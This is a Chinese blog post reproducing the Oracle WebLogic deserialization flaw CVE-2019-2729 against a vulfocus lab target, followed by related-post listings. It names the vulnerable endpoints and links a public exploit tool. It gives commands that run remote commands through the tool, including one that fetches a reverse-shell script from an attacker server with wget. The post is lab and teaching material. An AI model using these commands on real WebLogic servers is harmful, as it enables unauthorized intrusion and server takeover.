weblogic 反序列化 (CVE-2019-2729)复现

最新推荐文章于 2022-11-08 17:35:39 发布
最新推荐文章于 2022-11-08 17:35:39 发布
阅读量5.1k 收藏 5
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121115028
版权

@[TOC](weblogic 反序列化 (CVE-2019-2729))
所有文章,仅供安全研究与学习之用,后果自负!

weblogic 反序列化 (CVE-2019-2729)

0x01 漏洞描述

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 CVE-2019-2729漏洞是对CVE-2019-2725漏洞补丁进行绕过,形成新的漏洞利用方式,属于CVE-2019-2725漏洞的变形绕过。与CVE-2019-2725漏洞相似,CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意HTTP请求,用于获得目标服务器的权限,并在未授权的情况下执行远程命令,最终获取服务器的权限。

该漏洞本质是由于 wls9-async组件在反序列化处理输入信息时存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。

7001端口

影响组件:
wls9_async_response.war
wls-wsat.war

漏洞url为

url:port/_async/AsyncResponseService

0x02 影响范围

Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0

0x03 漏洞复现

vulfocus靶场
在这里插入图片描述

(1)访问下边的url地址 可以 访问 可能存在漏洞

	http://118.193.36.37:44829/_async/AsyncResponseService

在这里插入图片描述

(2) 漏洞利用地址
/wls-wsat/CoordinatorPortType
抓包访问

贴入如下 请求包 修改target 和conmmand即可
在这里插入图片描述

在这里插入图片描述

工具

工具地址:
https://github.com/ruthlezs/CVE-2019-2729-Exploit

(1) 查看用法

python oracle-weblogic-deserialize.py -h

在这里插入图片描述
(2) 执行id命令

python oracle-weblogic-deserialize.py -u http://118.193.36.37:63126/ -c id

在这里插入图片描述

(3) 获取flag(如果报错timeout 多尝试几次)

python oracle-weblogic-deserialize.py -u http://118.193.36.37:63126/ -c "ls /tmp"

在这里插入图片描述
(4) 下载攻击vps上 连接shell的 cmd.sh文件 到指定tmp目录

python oracle-weblogic-deserialize.py -u http://118.193.36.37:63126/ -c "wget http://X.X.X.X/cmd.sh -P /tmp"

在这里插入图片描述

(5) 看是否下载成功

python oracle-weblogic-deserialize.py -u http://118.193.36.37:63126/ -c "ls /tmp"

在这里插入图片描述
(6)赋予执行权限 后运行 cmd.sh 连接失败
ls -l /tmp 命令 没有执行成功 不知道赋权失败 还是 执行cmd.sh失败

在这里插入图片描述

0x04 漏洞修复

打补丁

LuckyCharm~
关注
专栏目录
复现nuclei——CVE-2019-2729Weblogic反序列化远程代码执行漏洞)
记录并分享学习安全的知识点..
01-20 2384
一、漏洞介绍 该漏洞是由wls9-async组件导致,在反序列化处理输入信息时存在缺陷,攻击者可以在/_async/AsyncResponseService路径下传入恶意的XML格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,进而攻击者可以获得整台服务器的权限。 二、影响版本 WebLogic 10.X WebLogic 12.1.3 三、漏洞检测方法 法一:访问http://youip:7001/_async/(返回403说明存在,返回404说明不存在)
Weblogic反序列化远程代码执行漏洞 (CVE-2019-2725)复现
hackzkaq的博客
03-10 4205
更多黑客技能 公众号:小道黑客 0x01 漏洞描述: wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 0x02 影响版本: Oracle WebLogic Server10.x Oracle WebLogic Server12.1.3.0.0 0x03 影响组件: wls9_async_res
poc weblogic 漏洞利用_WebLogic RCE(CVE20192725)漏洞之旅
weixin_33334565的博客
12-08 987
作者:Badcode@知道创宇404实验室时间:2019年4月30日4172019年4月17日,CNVD 发布《关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞的安全公告》[1],公告指出部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信...
CVE-2019-2729 WebLogic RCE漏洞白名单补丁分析
systemino的博客
07-04 5973
WebLogic组件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。WebLogic是商...
Weblogic反序列化漏洞(CVE-2019-2729
weixin_41182861的博客
09-25 4048
漏洞简述 CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意 HTTP 请求,用于获得目标服务器的权限,并在未授权的情况下执行远程命令,最终获取服务器的权限。与CVE-2019-2725漏洞类似。 漏洞编号:CVE-2019-2725 影响版本:10.3.6.0、12.1.3.0、12.2.1.3 测试环境:Linux || vulhub || Weblogic 10.3.6.0 复现开始 PoC攻击脚本: https://git
weblogic cve_2019_2729.rar
10-10
Oracle WebLogic Server Patch Set Update 10.3.6.0.190716 README ============================================================== This README provides information about how to apply Oracle WebLogic Server Patch Set Update 10.3.6.0.190716. It also provides information about reverting to the original version. Released: July, 2019 Smart Update Details of Oracle WebLogic Server Patch Set Update 10.3.6.0.190716 -------------------------------------------------------------------------- Patch ID - MXLE Patch Number - 29633432 Preparing to Install Oracle WebLogic Server Patch Set Update 10.3.6.0.190716
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2729)
00勇士王子的博客
07-15 1893
漏洞介绍 解题过程 1.访问靶场 2.漏洞存在于:_async/AsyncResponseService,访问地址可以访问则存在漏洞 3.使用burp抓包然后构造payload发送到服务器,使服务器执行命令 执行id命令 执行whoami 命令 执行ls /tmp 命令,没有返回结果 POC ...
weblogic 升级jdk_漏洞预警|Weblogic反序列化远程命令执行漏洞(CVE20192729)
weixin_39557419的博客
12-13 538
漏洞描述近日,HSCERT监测发现,在野Oracle Weblogic远程反序列化命令执行漏洞,该漏洞绕过了最新的Weblogic补丁,攻击者可以发送精心构造的恶意HTTP请求,在未授权的情况下远程执行命令。Oracle官方在近日的安全公告中为该漏洞添加了编号CVE-2019-2729WebLogic是美国Oracle公司出品的Java应用服务器,WebLogic是用于开发、集成、部署...
[CVE-2019-2729] Weblogc XMLDecoder RCE
公众号shadow sock7
04-10 2454
长亭的xray的poc的扫描结果: 1)jdk-6u45 weblogic-10.3.6.0: weblogic-cve-2019-2729-2.yml和weblogic-cve-2019-2729-1.yml均有效; 2)jdk-7u79 weblogic-12.1.3.0: weblogic-cve-2019-2729-2.yml和weblogic-cve-2019-2729-1.yml均...
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
Weblogic:Weblogic CVE-2019-2725 CVE-2019-2729 Getshell命令执行
03-11
weblogic CVE-2019-2725 CVE-2019-2729 POC 执行命令并回显 usage: 单个目标 python3 weblogic_get_webshell.py http://url 批量目标,将批量url放入url_list.txt python3 weblogic_get_webshell.py all
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
WebLogic CVE-2019-2725补丁.zip
07-16
weblogic反序列化补丁包
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
Oracle刚刚发布了安全警报CVE-2019-2729
allway2的博客
06-19 4544
Oracle刚刚发布了安全警报CVE-2019-2729。此漏洞影响许多版本的Oracle WebLogic Server,其CVSS基本分数为9.8。WebLogic Server客户应参阅安全警报通报,以获取有关受影响版本以及如何获取所需修补程序的信息。 请注意,虽然此警报解决的问题是反序列化漏洞,如安全警报CVE-2019-2725中所述,但它是一个明显的漏洞。 由于此漏洞的严重性,O...
第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程
ABC_123的博客
06-27 2022
Part1前言大家好,我是ABC_123。前两期分享了《第14篇:Struts2框架下Log4j2漏洞检测方法分析与总结》、《第15篇:内网横向中windows各端口远程登录哈希传递的方法总结》,本期讲解一个Weblogic拿权限案例。最近安服的同事打比赛,给我陆续发了好几个没有拿下来的Weblogic的站点,一直在想尽各种办法研究,争取拿下权限。各种WAF防护、终...
weblogic反序列化介绍及环境搭建
遇事不决冲冲冲
05-08 3791
weblogic是一个常用的web中间件,它的反序列化漏洞也算是比较经典,而在weblogic里面其实反序列化漏洞大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML的反序列化漏洞,一个原因就是配置环境配了好长时间,这篇就当作专门介绍环境搭建了吧Cve-2017-3506Cve-2017-10271Cve-2019-2729Cve-2019-2725CVE-2015-4852CVE-2016-0638CVE-2016-3510CVE-2017-3248CVE-2018-2628 CVE-20
高危安全漏洞风险提示:Oracle7月修复Weblogic Server严重RCE漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-08 650
Oracle 解决的最严重问题之一是通过 Oracle WebLogic Server Web 服务中的 XMLDecoder 存在的严重反序列化漏洞。该 CVE-2019 年至 2729 年的漏洞就是可通过未经认证的攻击者利用的远程执行代码漏洞。高危安全漏洞风险提示:Oracle7月修复Weblogic Server严重RCE漏洞. “此安全警报解决了 CVE-2019-2729,这是一个通过 Oracle WebLogic Server Web 服务中的 XMLDecoder 实现的反序列化漏洞。该远
以下Weblogic漏洞为反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
最新发布
06-08
以下Weblogic漏洞为反序列化的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的反序列化漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意序列化数据,从而实现远程代码执行、绕过身份验证等攻击。 以下是反序列化漏洞的相关信息: A. CVE-2017-10271:WebLogic Server WLS-WSAT组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现远程代码执行。 B. CVE-2018-2628:WebLogic Server T3协议反序列化漏洞,攻击者可以通过构造特定的T3协议请求,实现远程代码执行。 C. CVE-2014-4210:WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506:WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份验证。 因此,选项A、B和D是反序列化漏洞。 答案:A、B、D。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值